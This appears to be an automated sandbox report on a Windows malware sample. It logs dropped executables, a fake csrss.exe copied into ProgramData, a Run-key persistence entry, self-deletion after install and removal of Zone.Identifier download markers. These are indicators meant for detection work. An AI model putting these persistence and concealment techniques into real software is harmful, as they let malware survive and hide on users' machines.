Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC82C9 push cs; iretd	0_2_00AC82CB
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC21C1 pushfd ; ret	0_2_00AC22A0
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC4A28 push ss; iretd	0_2_00AC4A2E
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_004014A1 push es; iretd	4_2_004014A3
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_004022A8 pushfd ; ret	4_2_004022C7
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_008A33D0 push ss; iretd	4_2_008A33D6
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_008A002E push es; iretd	4_2_008A004E
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_008A0544 push 8A1E29FAh; iretd	4_2_008A0549
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_008A0B69 pushfd ; ret	4_2_008A0C48
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_008A6C71 push cs; iretd	4_2_008A6C73
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_009C230F pushfd ; ret	4_2_009C232E
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_009C1506 push es; iretd	4_2_009C150A
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_051A170A pushad ; ret	5_2_051A170C
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_0520780A push 5A36841Dh; retf	5_2_05207825
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_0523F4BD push cs; ret	5_2_0523F4BE
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_052077ED push ebp; retf	5_2_052077EE
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_0523F7F8 push edx; retf	5_2_0523F7F9
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_0514D2EF push ebx; iretd	5_2_0514D2F7
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00403520 push eax; ret	8_2_00403535
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00405571 push ecx; ret	8_2_00405584
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E91CD push ecx; ret	8_2_005E91CC
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005842E0 push eax; mov dword ptr [esp], 00000000h	8_2_005842E2
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_057126EA pushad ; ret	12_2_057126EC
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_057787EA push 5A36841Dh; retf	12_2_05778805
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_057B07D8 push edx; retf	12_2_057B07D9

Source: initial sample	Static PE information: section name: .text entropy: 7.382127737137534
Source: initial sample	Static PE information: section name: .text entropy: 7.3799782328949375
Source: initial sample	Static PE information: section name: .text entropy: 7.382127737137534
Source: initial sample	Static PE information: section name: .text entropy: 7.3799782328949375

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\2788.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\select.pyd	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5F46.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_bz2.pyd	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2788.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sfriduf	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\46BC.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6F54.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4294.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fcriduf	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3EBB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\python37.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2788.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56002\tk86t.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2788.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sfriduf			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fcriduf			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2788.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\hvqtxn73ud.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\sfriduf:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fcriduf:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\csrss.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
